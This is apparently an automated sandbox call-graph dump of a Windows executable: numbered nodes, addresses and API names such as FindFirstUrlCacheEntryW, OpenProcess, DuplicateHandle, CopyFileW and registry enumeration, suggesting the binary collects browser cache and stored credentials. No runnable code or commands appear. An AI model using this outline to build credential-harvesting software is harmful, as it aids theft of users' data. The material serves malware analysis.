409c89 38813->38814 38814->38482 38815->38512 38817 413d39 38816->38817 38818 413d2f FreeLibrary 38816->38818 38819 40b633 ??3@YAXPAX 38817->38819 38818->38817 38820 413d42 38819->38820 38821 40b633 ??3@YAXPAX 38820->38821 38822 413d4a 38821->38822 38822->38340 38823->38343 38824->38394 38825->38408 38827 44db70 38826->38827 38828 40b6fc memset 38827->38828 38829 409c70 2 API calls 38828->38829 38830 40b732 wcsrchr 38829->38830 38831 40b743 38830->38831 38832 40b746 memset 38830->38832 38831->38832 38833 40b2cc 27 API calls 38832->38833 38834 40b76f 38833->38834 38835 409d1f 6 API calls 38834->38835 38836 40b783 38835->38836 39677 409b98 GetFileAttributesW 38836->39677 38838 40b792 38839 40b7c2 38838->38839 38840 409c70 2 API calls 38838->38840 39678 40bb98 38839->39678 38842 40b7a5 38840->38842 38844 40b2cc 27 API calls 38842->38844 38848 40b7b2 38844->38848 38845 40b837 FindCloseChangeNotification 38847 40b83e memset 38845->38847 38846 40b817 39712 409a45 GetTempPathW 38846->39712 39711 40a6e6 WideCharToMultiByte 38847->39711 38851 409d1f 6 API calls 38848->38851 38851->38839 38852 40b827 CopyFileW 38852->38847 38853 40b866 38854 444432 121 API calls 38853->38854 38855 40b879 38854->38855 38856 40bad5 38855->38856 38857 40b273 27 API calls 38855->38857 38858 40baeb 38856->38858 38859 40bade DeleteFileW 38856->38859 38860 40b89a 38857->38860 38861 40b04b ??3@YAXPAX 38858->38861 38859->38858 38862 438552 134 API calls 38860->38862 38863 40baf3 38861->38863 38864 40b8a4 38862->38864 38863->38419 38865 40bacd 38864->38865 38867 4251c4 137 API calls 38864->38867 38866 443d90 111 API calls 38865->38866 38866->38856 38890 40b8b8 38867->38890 38868 40bac6 39724 424f26 123 API calls 38868->39724 38869 40b8bd memset 39715 425413 17 API calls 38869->39715 38872 425413 17 API calls 38872->38890 38875 40a71b MultiByteToWideChar 38875->38890 38876 40a734 MultiByteToWideChar 38876->38890 38879 40b9b5 memcmp 38879->38890 38880 4099c6 2 API calls 38880->38890 38881 404423 37 API calls 38881->38890 38884 40bb3e memset memcpy 39725 40a734 MultiByteToWideChar 38884->39725 38885 4251c4 137 API calls 38885->38890 38887 40bb88 LocalFree 38887->38890 38890->38868 38890->38869 38890->38872 38890->38875 38890->38876 38890->38879 38890->38880 38890->38881 38890->38884 38890->38885 38891 40ba5f memcmp 38890->38891 39716 4253ef 16 API calls 38890->39716 39717 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38890->39717 39718 4253af 17 API calls 38890->39718 39719 4253cf 17 API calls 38890->39719 39720 447280 memset 38890->39720 39721 447960 memset memcpy memcpy memcpy 38890->39721 39722 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38890->39722 39723 447920 memcpy memcpy memcpy 38890->39723 38891->38890 38892->38421 38894 40aed1 38893->38894 38895 40aec7 FindClose 38893->38895 38894->38353 38895->38894 38897 4099d7 38896->38897 38898 4099da memcpy 38896->38898 38897->38898 38898->38404 38900 40b2cc 27 API calls 38899->38900 38901 44543f 38900->38901 38902 409d1f 6 API calls 38901->38902 38903 44544f 38902->38903 39817 409b98 GetFileAttributesW 38903->39817 38905 44545e 38906 445476 38905->38906 38907 40b6ef 252 API calls 38905->38907 38908 40b2cc 27 API calls 38906->38908 38907->38906 38909 445482 38908->38909 38910 409d1f 6 API calls 38909->38910 38911 445492 38910->38911 39818 409b98 GetFileAttributesW 38911->39818 38913 4454a1 38914 4454b9 38913->38914 38915 40b6ef 252 API calls 38913->38915 38914->38434 38915->38914 38916->38433 38917->38450 38918->38456 38919->38493 38920->38471 38921->38520 38922->38520 38923->38503 38924->38531 38925->38533 38926->38535 38928 414c2e 16 API calls 38927->38928 38929 40c2ae 38928->38929 38999 40c1d3 38929->38999 38934 40c3be 38951 40a8ab 38934->38951 38935 40afcf 2 API calls 38936 40c2fd FindFirstUrlCacheEntryW 38935->38936 38937 40c3b6 38936->38937 38938 40c31e wcschr 38936->38938 38939 40b04b ??3@YAXPAX 38937->38939 38940 40c331 38938->38940 38941 40c35e FindNextUrlCacheEntryW 38938->38941 38939->38934 38942 40a8ab 9 API calls 38940->38942 38941->38938 38943 40c373 GetLastError 38941->38943 38946 40c33e wcschr 38942->38946 38944 40c3ad FindCloseUrlCache 38943->38944 38945 40c37e 38943->38945 38944->38937 38947 40afcf 2 API calls 38945->38947 38946->38941 38948 40c34f 38946->38948 38949 40c391 FindNextUrlCacheEntryW 38947->38949 38950 40a8ab 9 API calls 38948->38950 38949->38938 38949->38944 38950->38941 39115 40a97a 38951->39115 38954 40a8cc 38954->38542 38955 40a8d0 7 API calls 38955->38954 39120 40b1ab ??3@YAXPAX ??3@YAXPAX 38956->39120 38958 40c3dd 38959 40b2cc 27 API calls 38958->38959 38960 40c3e7 38959->38960 39121 414592 RegOpenKeyExW 38960->39121 38962 40c3f4 38963 40c50e 38962->38963 38964 40c3ff 38962->38964 38978 405337 38963->38978 38965 40a9ce 4 API calls 38964->38965 38966 40c418 memset 38965->38966 39122 40aa1d 38966->39122 38969 40c471 38971 40c47a _wcsupr 38969->38971 38970 40c505 RegCloseKey 38970->38963 38972 40a8d0 7 API calls 38971->38972 38973 40c498 38972->38973 38974 40a8d0 7 API calls 38973->38974 38975 40c4ac memset 38974->38975 38976 40aa1d 38975->38976 38977 40c4e4 RegEnumValueW 38976->38977 38977->38970 38977->38971 39124 405220 38978->39124 38982 4099c6 2 API calls 38981->38982 38983 40a714 _wcslwr 38982->38983 38984 40c634 38983->38984 39181 405361 38984->39181 38987 40c65c wcslen 39184 4053b6 39 API calls 38987->39184 38988 40c71d wcslen 38988->38549 38990 40c677 38991 40c713 38990->38991 39185 40538b 39 API calls 38990->39185 39187 4053df 39 API calls 38991->39187 38994 40c6a5 38994->38991 38995 40c6a9 memset 38994->38995 38996 40c6d3 38995->38996 39186 40c589 43 API calls 38996->39186 38998->38550 39000 40ae18 9 API calls 38999->39000 39006 40c210 39000->39006 39001 40ae51 9 API calls 39001->39006 39002 40c264 39003 40aebe FindClose 39002->39003 39005 40c26f 39003->39005 39004 40add4 2 API calls 39004->39006 39011 40e5ed memset memset 39005->39011 39006->39001 39006->39002 39006->39004 39007 40c231 _wcsicmp 39006->39007 39008 40c1d3 35 API calls 39006->39008 39007->39006 39009 40c248 39007->39009 39008->39006 39024 40c084 22 API calls 39009->39024 39012 414c2e 16 API calls 39011->39012 39013 40e63f 39012->39013 39014 409d1f 6 API calls 39013->39014 39015 40e658 39014->39015 39025 409b98 GetFileAttributesW 39015->39025 39017 40e667 39018 40e680 39017->39018 39019 409d1f 6 API calls 39017->39019 39026 409b98 GetFileAttributesW 39018->39026 39019->39018 39021 40e68f 39022 40c2d8 39021->39022 39027 40e4b2 39021->39027 39022->38934 39022->38935 39024->39006 39025->39017 39026->39021 39048 40e01e 39027->39048 39029 40e593 39031 40e5b0 39029->39031 39032 40e59c DeleteFileW 39029->39032 39030 40e521 39030->39029 39071 40e175 39030->39071 39033 40b04b ??3@YAXPAX 39031->39033 39032->39031 39034 40e5bb 39033->39034 39036 40e5c4 CloseHandle 39034->39036 39037 40e5cc 39034->39037 39036->39037 39039 40b633 ??3@YAXPAX 39037->39039 39038 40e573 39040 40e584 39038->39040 39041 40e57c FindCloseChangeNotification 39038->39041 39042 40e5db 39039->39042 39114 40b1ab ??3@YAXPAX ??3@YAXPAX 39040->39114 39041->39040 39045 40b633 ??3@YAXPAX 39042->39045 39044 40e540 39044->39038 39091 40e2ab 39044->39091 39046 40e5e3 39045->39046 39046->39022 39049 406214 22 API calls 39048->39049 39050 40e03c 39049->39050 39051 40e16b 39050->39051 39052 40dd85 74 API calls 39050->39052 39051->39030 39053 40e06b 39052->39053 39053->39051 39054 40afcf ??2@YAPAXI ??3@YAXPAX 39053->39054 39055 40e08d OpenProcess 39054->39055 39056 40e0a4 GetCurrentProcess DuplicateHandle 39055->39056 39060 40e152 39055->39060 39057 40e0d0 GetFileSize 39056->39057 39058 40e14a CloseHandle 39056->39058 39061 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39057->39061 39058->39060 39059 40e160 39063 40b04b ??3@YAXPAX 39059->39063 39060->39059 39062 406214 22 API calls 39060->39062 39064 40e0ea 39061->39064 39062->39059 39063->39051 39065 4096dc CreateFileW 39064->39065 39066 40e0f1 CreateFileMappingW 39065->39066 39067 40e140 CloseHandle CloseHandle 39066->39067 39068 40e10b MapViewOfFile 39066->39068 39067->39058 39069 40e13b FindCloseChangeNotification 39068->39069 39070 40e11f WriteFile UnmapViewOfFile 39068->39070 39069->39067 39070->39069 39072 40e18c 39071->39072 39073 406b90 11 API calls 39072->39073 39074 40e19f 39073->39074 39075 40e1a7 memset 39074->39075 39076 40e299 39074->39076 39081 40e1e8 39075->39081 39077 4069a3 ??3@YAXPAX ??3@YAXPAX 39076->39077 39078 40e2a4 39077->39078 39078->39044 39079 406e8f 13 API calls 39079->39081 39080 406b53 SetFilePointerEx ReadFile 39080->39081 39081->39079 39081->39080 39082 40e283 39081->39082 39083 40dd50 _wcsicmp 39081->39083 39087 40742e 8 API calls 39081->39087 39088 40aae3 wcslen wcslen _memicmp 39081->39088 39089 40e244 _snwprintf 39081->39089 39084 40e291 39082->39084 39085 40e288 ??3@YAXPAX 39082->39085 39083->39081 39086 40aa04 ??3@YAXPAX 39084->39086 39085->39084 39086->39076 39087->39081 39088->39081 39090 40a8d0 7 API calls 39089->39090 39090->39081 39092 40e2c2 39091->39092 39093 406b90 11 API calls 39092->39093 39104 40e2d3 39093->39104 39094 40e4a0 39095 4069a3 ??3@YAXPAX ??3@YAXPAX 39094->39095 39097 40e4ab 39095->39097 39096 406e8f 13 API calls 39096->39104 39097->39044 39098 406b53 SetFilePointerEx ReadFile 39098->39104 39099 40e489 39100 40aa04 ??3@YAXPAX 39099->39100 39101 40e491 39100->39101 39101->39094 39102 40e497 ??3@YAXPAX 39101->39102 39102->39094 39103 40dd50 _wcsicmp 39103->39104 39104->39094 39104->39096 39104->39098 39104->39099 39104->39103 39105 40dd50 _wcsicmp 39104->39105 39108 40742e 8 API calls 39104->39108 39109 40e3e0 memcpy 39104->39109 39110 40e3b3 wcschr 39104->39110 39111 40e3fb memcpy 39104->39111 39112 40e416 memcpy 39104->39112 39113 40e431 memcpy 39104->39113 39106 40e376 memset 39105->39106 39107 40aa29 6 API calls 39106->39107 39107->39104 39108->39104 39109->39104 39110->39104 39111->39104 39112->39104 39113->39104 39114->39029 39117 40a980 39115->39117 39116 40a8bb 39116->38954 39116->38955 39117->39116 39118 40a995 _wcsicmp 39117->39118 39119 40a99c wcscmp 39117->39119 39118->39117 39119->39117 39120->38958 39121->38962 39123 40aa23 RegEnumValueW 39122->39123 39123->38969 39123->38970 39125 405335 39124->39125 39126 40522a 39124->39126 39125->38549 39127 40b2cc 27 API calls 39126->39127 39128 405234 39127->39128 39129 40a804 8 API calls 39128->39129 39130 40523a 39129->39130 39169 40b273 39130->39169 39132 405248 _mbscpy _mbscat GetProcAddress 39133 40b273 27 API calls 39132->39133 39134 405279 39133->39134 39172 405211 GetProcAddress 39134->39172 39136 405282 39137 40b273 27 API calls 39136->39137 39138 40528f 39137->39138 39173 405211 GetProcAddress 39138->39173 39140 405298 39141 40b273 27 API calls 39140->39141 39142 4052a5 39141->39142 39174 405211 GetProcAddress 39142->39174 39144 4052ae 39145 40b273 27 API calls 39144->39145 39146 4052bb 39145->39146 39175 405211 GetProcAddress 39146->39175 39148 4052c4 39149 40b273 27 API calls 39148->39149 39150 4052d1 39149->39150 39176 405211 GetProcAddress 39150->39176 39152 4052da 39153 40b273 27 API calls 39152->39153 39154 4052e7 39153->39154 39177 405211 GetProcAddress 39154->39177 39156 4052f0 39157 40b273 27 API calls 39156->39157 39158 4052fd 39157->39158 39178 405211 GetProcAddress 39158->39178 39160 405306 39161 40b273 27 API calls 39160->39161 39162 405313 39161->39162 39179 405211 GetProcAddress 39162->39179 39164 40531c 39165 40b273 27 API calls 39164->39165 39166 405329 39165->39166 39170 40b58d 27 API calls 39169->39170 39171 40b18c 39170->39171 39171->39132 39172->39136 39173->39140 39174->39144 39175->39148 39176->39152 39177->39156 39178->39160 39179->39164 39182 405220 39 API calls 39181->39182 39183 405369 39182->39183 39183->38987 39183->38988 39184->38990 39185->38994 39186->38991 39187->38988 39189 40440c FreeLibrary 39188->39189 39190 40436d 39189->39190 39191 40a804 8 API calls 39190->39191 39192 404377 39191->39192 39193 404383 39192->39193 39194 404405 39192->39194 39195 40b273 27 API calls 39193->39195 39194->38561 39194->38563 39194->38564 39196 40438d GetProcAddress 39195->39196 39197 40b273 27 API calls 39196->39197 39198 4043a7 GetProcAddress 39197->39198 39199 40b273 27 API calls 39198->39199 39200 4043ba GetProcAddress 39199->39200 39201 40b273 27 API calls 39200->39201 39202 4043ce GetProcAddress 39201->39202 39203 40b273 27 API calls 39202->39203 39204 4043e2 GetProcAddress 39203->39204 39205 4043f1 39204->39205 39206 4043f7 39205->39206 39207 40440c FreeLibrary 39205->39207 39206->39194 39207->39194 39209 404413 FreeLibrary 39208->39209 39210 40441e 39208->39210 39209->39210 39210->38578 39211->38569 39213 40442e 39212->39213 39214 40447e 39212->39214 39215 40b2cc 27 API calls 39213->39215 39214->38569 39216 404438 39215->39216 39217 40a804 8 API calls 39216->39217 39218 40443e 39217->39218 39219 404445 39218->39219 39220 404467 39218->39220 39221 40b273 27 API calls 39219->39221 39220->39214 39222 404475 FreeLibrary 39220->39222 39223 40444f GetProcAddress 39221->39223 39222->39214 39223->39220 39224 404460 39223->39224 39224->39220 39226 4135f6 39225->39226 39227 4135eb FreeLibrary 39225->39227 39226->38581 39227->39226 39229 4449c4 39228->39229 39230 444a52 39228->39230 39231 40b2cc 27 API calls 39229->39231 39230->38598 39230->38599 39232 4449cb 39231->39232 39233 40a804 8 API calls 39232->39233 39234 4449d1 39233->39234 39235 40b273 27 API calls 39234->39235 39236 4449dc GetProcAddress 39235->39236 39237 40b273 27 API calls 39236->39237 39238 4449f3 GetProcAddress 39237->39238 39239 40b273 27 API calls 39238->39239 39240 444a04 GetProcAddress 39239->39240 39241 40b273 27 API calls 39240->39241 39242 444a15 GetProcAddress 39241->39242 39243 40b273 27 API calls 39242->39243 39244 444a26 GetProcAddress 39243->39244 39245 40b273 27 API calls 39244->39245 39249->38609 39250->38609 39251->38609 39252->38609 39253->38600 39255 403a29 39254->39255 39269 403bed memset memset 39255->39269 39257 403ae7 39282 40b1ab ??3@YAXPAX ??3@YAXPAX 39257->39282 39258 403a3f memset 39264 403a2f 39258->39264 39260 403aef 39260->38617 39261 409b98 GetFileAttributesW 39261->39264 39262 40a8d0 7 API calls 39262->39264 39263 409d1f 6 API calls 39263->39264 39264->39257 39264->39258 39264->39261 39264->39262 39264->39263 39266 40a051 GetFileTime FindCloseChangeNotification 39265->39266 39267 4039ca CompareFileTime 39265->39267 39266->39267 39267->38617 39268->38616 39270 414c2e 16 API calls 39269->39270 39271 403c38 39270->39271 39272 409719 2 API calls 39271->39272 39273 403c3f wcscat 39272->39273 39274 414c2e 16 API calls 39273->39274 39275 403c61 39274->39275 39276 409719 2 API calls 39275->39276 39277 403c68 wcscat 39276->39277 39283 403af5 39277->39283 39280 403af5 20 API calls 39281 403c95 39280->39281 39281->39264 39282->39260 39284 403b02 39283->39284 39285 40ae18 9 API calls 39284->39285 39293 403b37 39285->39293 39286 403bdb 39288 40aebe FindClose 39286->39288 39287 40add4 wcscmp wcscmp 39287->39293 39289 403be6 39288->39289 39289->39280 39290 40ae18 9 API calls 39290->39293 39291 40ae51 9 API calls 39291->39293 39292 40aebe FindClose 39292->39293 39293->39286 39293->39287 39293->39290 39293->39291 39293->39292 39294 40a8d0 7 API calls 39293->39294 39294->39293 39296 409d1f 6 API calls 39295->39296 39297 404190 39296->39297 39310 409b98 GetFileAttributesW 39297->39310 39299 40419c 39300 4041a7 6 API calls 39299->39300 39301 40435c 39299->39301 39303 40424f 39300->39303 39301->38643 39303->39301 39304 40425e memset 39303->39304 39306 409d1f 6 API calls 39303->39306 39307 40a8ab 9 API calls 39303->39307 39311 414842 39303->39311 39304->39303 39305 404296 wcscpy 39304->39305 39305->39303 39306->39303 39308 4042b6 memset memset _snwprintf wcscpy 39307->39308 39308->39303 39309->38641 39310->39299 39314 41443e 39311->39314 39313 414866 39313->39303 39315 41444b 39314->39315 39316 414451 39315->39316 39317 4144a3 GetPrivateProfileStringW 39315->39317 39318 414491 39316->39318 39319 414455 wcschr 39316->39319 39317->39313 39321 414495 WritePrivateProfileStringW 39318->39321 39319->39318 39320 414463 _snwprintf 39319->39320 39320->39321 39321->39313 39322->38647 39324 40b2cc 27 API calls 39323->39324 39325 409615 39324->39325 39326 409d1f 6 API calls 39325->39326 39327 409625 39326->39327 39352 409b98 GetFileAttributesW 39327->39352 39329 409634 39330 409648 39329->39330 39353 4091b8 memset 39329->39353 39332 40b2cc 27 API calls 39330->39332 39334 408801 39330->39334 39333 40965d 39332->39333 39335 409d1f 6 API calls 39333->39335 39334->38650 39334->38651 39336 40966d 39335->39336 39405 409b98 GetFileAttributesW 39336->39405 39338 40967c 39338->39334 39339 409681 39338->39339 39406 409529 72 API calls 39339->39406 39341 409690 39341->39334 39352->39329 39407 40a6e6 WideCharToMultiByte 39353->39407 39355 409202 39408 444432 39355->39408 39358 40b273 27 API calls 39359 409236 39358->39359 39454 438552 39359->39454 39362 409383 39364 40b273 27 API calls 39362->39364 39366 409399 39364->39366 39368 438552 134 API calls 39366->39368 39386 4093a3 39368->39386 39372 4094ff 39375 4251c4 137 API calls 39375->39386 39379 4093df 39383 4253cf 17 API calls 39383->39386 39385 40951d 39385->39330 39386->39372 39386->39375 39386->39379 39386->39383 39388 4093e4 39386->39388 39405->39338 39406->39341 39407->39355 39504 4438b5 39408->39504 39410 44444c 39416 409215 39410->39416 39518 415a6d 39410->39518 39412 4442e6 11 API calls 39414 44469e 39412->39414 39413 444486 39415 4444b9 memcpy 39413->39415 39453 4444a4 39413->39453 39414->39416 39418 443d90 111 API calls 39414->39418 39522 415258 39415->39522 39416->39358 39416->39385 39418->39416 39419 444524 39420 444541 39419->39420 39421 44452a 39419->39421 39525 444316 39420->39525 39422 416935 16 API calls 39421->39422 39422->39453 39425 444316 18 API calls 39426 444563 39425->39426 39453->39412 39592 438460 39454->39592 39456 409240 39456->39362 39457 4251c4 39456->39457 39604 424f07 39457->39604 39459 4251e4 39505 4438d0 39504->39505 39515 4438c9 39504->39515 39506 415378 memcpy memcpy 39505->39506 39507 4438d5 39506->39507 39508 4154e2 10 API calls 39507->39508 39509 443906 39507->39509 39507->39515 39508->39509 39510 443970 memset 39509->39510 39509->39515 39513 44398b 39510->39513 39511 4439a0 39512 415700 10 API calls 39511->39512 39511->39515 39516 4439c0 39512->39516 39513->39511 39514 41975c 10 API calls 39513->39514 39514->39511 39515->39410 39516->39515 39517 418981 10 API calls 39516->39517 39517->39515 39519 415a77 39518->39519 39520 415a8d 39519->39520 39521 415a7e memset 39519->39521 39520->39413 39521->39520 39523 4438b5 11 API calls 39522->39523 39524 41525d 39523->39524 39524->39419 39526 444328 39525->39526 39527 444423 39526->39527 39528 44434e 39526->39528 39529 4446ea 11 API calls 39527->39529 39530 432d4e memset memset memcpy 39528->39530 39536 444381 39529->39536 39531 44435a 39530->39531 39533 444375 39531->39533 39538 44438b 39531->39538 39532 432d4e memset memset memcpy 39536->39425 39538->39532 39593 41703f 11 API calls 39592->39593 39594 43847a 39593->39594 39595 43848a 39594->39595 39596 43847e 39594->39596 39598 438270 134 API calls 39595->39598 39597 4446ea 11 API calls 39596->39597 39600 438488 39597->39600 39599 4384aa 39598->39599 39599->39600 39601 424f26 123 API calls 39599->39601 39600->39456 39602 4384bb 39601->39602 39603 438270 134 API calls 39602->39603 39603->39600 39605 424f1f 39604->39605 39606 424f0c 39604->39606 39608 424eea 11 API calls 39605->39608 39607 416760 11 API calls 39606->39607 39609 424f18 39607->39609 39610 424f24 39608->39610 39609->39459 39610->39459 39661 413f4f 39634->39661 39637 413f37 K32GetModuleFileNameExW 39638 413f4a 39637->39638 39638->38710 39640 413969 wcscpy 39639->39640 39641 41396c wcschr 39639->39641 39653 413a3a 39640->39653 39641->39640 39643 41398e 39641->39643 39666 4097f7 wcslen wcslen _memicmp 39643->39666 39645 41399a 39646 4139a4 memset 39645->39646 39647 4139e6 39645->39647 39667 409dd5 GetWindowsDirectoryW wcscpy 39646->39667 39649 413a31 wcscpy 39647->39649 39650 4139ec memset 39647->39650 39649->39653 39668 409dd5 GetWindowsDirectoryW wcscpy 39650->39668 39651 4139c9 wcscpy wcscat 39651->39653 39653->38710 39654 413a11 memcpy wcscat 39654->39653 39656 413cb0 GetModuleHandleW 39655->39656 39657 413cda 39655->39657 39656->39657 39658 413cbf GetProcAddress 39656->39658 39659 413ce3 GetProcessTimes 39657->39659 39660 413cf6 39657->39660 39658->39657 39659->38712 39660->38712 39662 413f2f 39661->39662 39663 413f54 39661->39663 39662->39637 39662->39638 39664 40a804 8 API calls 39663->39664 39665 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39664->39665 39665->39662 39666->39645 39667->39651 39668->39654 39669->38732 39670->38756 39672 409cf9 GetVersionExW 39671->39672 39673 409d0a 39671->39673 39672->39673 39673->38762 39673->38766 39674->38768 39675->38771 39676->38773 39677->38838 39679 40bba5 39678->39679 39726 40cc26 39679->39726 39682 40bd4b 39747 40cc0c 39682->39747 39687 40b2cc 27 API calls 39688 40bbef 39687->39688 39754 40ccf0 _wcsicmp 39688->39754 39690 40bbf5 39690->39682 39755 40ccb4 6 API calls 39690->39755 39692 40bc26 39693 40cf04 17 API calls 39692->39693 39694 40bc2e 39693->39694 39695 40bd43 39694->39695 39696 40b2cc 27 API calls 39694->39696 39697 40cc0c 4 API calls 39695->39697 39698 40bc40 39696->39698 39697->39682 39756 40ccf0 _wcsicmp 39698->39756 39700 40bc46 39700->39695 39701 40bc61 memset memset WideCharToMultiByte 39700->39701 39757 40103c strlen 39701->39757 39703 40bcc0 39704 40b273 27 API calls 39703->39704 39705 40bcd0 memcmp 39704->39705 39705->39695 39706 40bce2 39705->39706 39707 404423 37 API calls 39706->39707 39708 40bd10 39707->39708 39708->39695 39709 40bd3a LocalFree 39708->39709 39710 40bd1f memcpy 39708->39710 39709->39695 39710->39709 39711->38853 39713 409a74 GetTempFileNameW 39712->39713 39714 409a66 GetWindowsDirectoryW 39712->39714 39713->38852 39714->39713 39715->38890 39716->38890 39717->38890 39718->38890 39719->38890 39720->38890 39721->38890 39722->38890 39723->38890 39724->38865 39725->38887 39758 4096c3 CreateFileW 39726->39758 39728 40cc34 39729 40cc3d GetFileSize 39728->39729 39737 40bbca 39728->39737 39730 40afcf 2 API calls 39729->39730 39731 40cc64 39730->39731 39759 40a2ef ReadFile 39731->39759 39733 40cc71 39760 40ab4a MultiByteToWideChar 39733->39760 39735 40cc95 FindCloseChangeNotification 39736 40b04b ??3@YAXPAX 39735->39736 39736->39737 39737->39682 39738 40cf04 39737->39738 39739 40b633 ??3@YAXPAX 39738->39739 39740 40cf14 39739->39740 39766 40b1ab ??3@YAXPAX ??3@YAXPAX 39740->39766 39742 40bbdd 39742->39682 39742->39687 39743 40cf1b 39743->39742 39745 40cfef 39743->39745 39767 40cd4b 39743->39767 39746 40cd4b 14 API calls 39745->39746 39746->39742 39748 40b633 ??3@YAXPAX 39747->39748 39749 40cc15 39748->39749 39750 40aa04 ??3@YAXPAX 39749->39750 39751 40cc1d 39750->39751 39816 40b1ab ??3@YAXPAX ??3@YAXPAX 39751->39816 39753 40b7d4 memset CreateFileW 39753->38845 39753->38846 39754->39690 39755->39692 39756->39700 39757->39703 39758->39728 39759->39733 39761 40ab6b 39760->39761 39765 40ab93 39760->39765 39762 40a9ce 4 API calls 39761->39762 39763 40ab74 39762->39763 39764 40ab7c MultiByteToWideChar 39763->39764 39764->39765 39765->39735 39766->39743 39768 40cd7b 39767->39768 39801 40aa29 39768->39801 39770 40cef5 39771 40aa04 ??3@YAXPAX 39770->39771 39772 40cefd 39771->39772 39772->39743 39774 40aa29 6 API calls 39775 40ce1d 39774->39775 39776 40aa29 6 API calls 39775->39776 39777 40ce3e 39776->39777 39778 40ce6a 39777->39778 39809 40abb7 wcslen memmove 39777->39809 39779 40ce9f 39778->39779 39812 40abb7 wcslen memmove 39778->39812 39781 40a8d0 7 API calls 39779->39781 39785 40ceb5 39781->39785 39782 40ce56 39810 40aa71 wcslen 39782->39810 39784 40ce8b 39813 40aa71 wcslen 39784->39813 39791 40a8d0 7 API calls 39785->39791 39788 40ce5e 39811 40abb7 wcslen memmove 39788->39811 39789 40ce93 39814 40abb7 wcslen memmove 39789->39814 39793 40cecb 39791->39793 39815 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39793->39815 39795 40cedd 39796 40aa04 ??3@YAXPAX 39795->39796 39797 40cee5 39796->39797 39798 40aa04 ??3@YAXPAX 39797->39798 39799 40ceed 39798->39799 39800 40aa04 ??3@YAXPAX 39799->39800 39800->39770 39802 40aa33 39801->39802 39803 40aa63 39801->39803 39804 40aa44 39802->39804 39805 40aa38 wcslen 39802->39805 39803->39770 39803->39774 39806 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39804->39806 39805->39804 39807 40aa4d 39806->39807 39807->39803 39808 40aa51 memcpy 39807->39808 39808->39803 39809->39782 39810->39788 39811->39778 39812->39784 39813->39789 39814->39779 39815->39795 39816->39753 39817->38905 39818->38913 37669 44dea5 37670 44deb5 FreeLibrary 37669->37670 37671 44dec3 37669->37671 37670->37671 39895 4148b6 FindResourceW 39896 4148f9 39895->39896 39897 4148cf SizeofResource 39895->39897 39897->39896 39898 4148e0 LoadResource 39897->39898 39898->39896 39899 4148ee LockResource 39898->39899 39899->39896 37853 415304 ??3@YAXPAX 37672 415320 realloc 37673 415340 37672->37673 37674 41534d 37672->37674 37676 416760 11 API calls 37674->37676 37676->37673 39819 427533 39823 427548 39819->39823 39832 425711 39819->39832 39820 4259da 39876 416760 11 API calls 39820->39876 39822 4275cb 39856 425506 39822->39856 39823->39822 39830 429b7a 39823->39830 39824 4260dd 39877 424251 120 API calls 39824->39877 39825 4259c2 39852 425ad6 39825->39852 39870 415c56 11 API calls 39825->39870 39882 4446ce 11 API calls 39830->39882 39832->39820 39832->39825 39835 429a4d 39832->39835 39836 422aeb memset memcpy memcpy 39832->39836 39840 4260a1 39832->39840 39846 429ac1 39832->39846 39855 425a38 39832->39855 39866 4227f0 memset memcpy 39832->39866 39867 422b84 15 API calls 39832->39867 39868 422b5d memset memcpy memcpy 39832->39868 39869 422640 13 API calls 39832->39869 39871 4241fc 11 API calls 39832->39871 39872 42413a 90 API calls 39832->39872 39837 429a66 39835->39837 39838 429a9b 39835->39838 39836->39832 39878 415c56 11 API calls 39837->39878 39842 429a96 39838->39842 39880 416760 11 API calls 39838->39880 39875 415c56 11 API calls 39840->39875 39881 424251 120 API calls 39842->39881 39845 429a7a 39879 416760 11 API calls 39845->39879 39846->39820 39846->39852 39883 415c56 11 API calls 39846->39883 39855->39825 39873 422640 13 API calls 39855->39873 39874 4226e0 12 API calls 39855->39874 39857 425554 39856->39857 39858 42554d 39856->39858 39885 422586 12 API calls 39857->39885 39884 423b34 103 API calls 39858->39884 39861 425567 39862 4255ba 39861->39862 39863 42556c memset 39861->39863 39862->39832 39864 425596 39863->39864 39864->39862 39865 4255a4 memset 39864->39865 39865->39862 39866->39832 39867->39832 39868->39832 39869->39832 39870->39820 39871->39832 39872->39832 39873->39855 39874->39855 39875->39820 39876->39824 39877->39852 39878->39845 39879->39842 39880->39842 39881->39846 39882->39846 39883->39820 39884->39857 39885->39861 39900 441b3f 39910 43a9f6 39900->39910 39902 441b61 40083 4386af memset 39902->40083 39904 44189a 39905 4418e2 39904->39905 39909 442bd4 39904->39909 39907 4418ea 39905->39907 40084 4414a9 12 API calls 39905->40084 39909->39907 40085 441409 memset 39909->40085 39911 43aa20 39910->39911 39912 43aadf 39910->39912 39911->39912 39913 43aa34 memset 39911->39913 39912->39902 39914 43aa56 39913->39914 39915 43aa4d 39913->39915 40086 43a6e7 39914->40086 40094 42c02e memset 39915->40094 39920 43aad3 40096 4169a7 11 API calls 39920->40096 39921 43aaae 39921->39912 39921->39920 39936 43aae5 39921->39936 39922 43ac18 39925 43ac47 39922->39925 40098 42bbd5 memcpy memcpy memcpy memset memcpy 39922->40098 39926 43aca8 39925->39926 40099 438eed 16 API calls 39925->40099 39930 43acd5 39926->39930 40101 4233ae 11 API calls 39926->40101 39929 43ac87 40100 4233c5 16 API calls 39929->40100 40102 423426 11 API calls 39930->40102 39934 43ace1 40103 439811 163 API calls 39934->40103 39935 43a9f6 161 API calls 39935->39936 39936->39912 39936->39922 39936->39935 40097 439bbb 22 API calls 39936->40097 39938 43acfd 39943 43ad2c 39938->39943 40104 438eed 16 API calls 39938->40104 39940 43ad19 40105 4233c5 16 API calls 39940->40105 39942 43ad58 40106 44081d 163 API calls 39942->40106 39943->39942 39946 43add9 39943->39946 40110 423426 11 API calls 39946->40110 39947 43ae3a memset 39948 43ae73 39947->39948 40111 42e1c0 147 API calls 39948->40111 39949 43adab 40108 438c4e 163 API calls 39949->40108 39950 43ad6c 39950->39912 39950->39949 40107 42370b memset memcpy memset 39950->40107 39954 43adcc 40109 440f84 12 API calls 39954->40109 39955 43ae96 40112 42e1c0 147 API calls 39955->40112 39958 43aea8 39959 43aec1 39958->39959 40113 42e199 147 API calls 39958->40113 39961 43af00 39959->39961 40114 42e1c0 147 API calls 39959->40114 39961->39912 39964 43af1a 39961->39964 39965 43b3d9 39961->39965 40115 438eed 16 API calls 39964->40115 39970 43b3f6 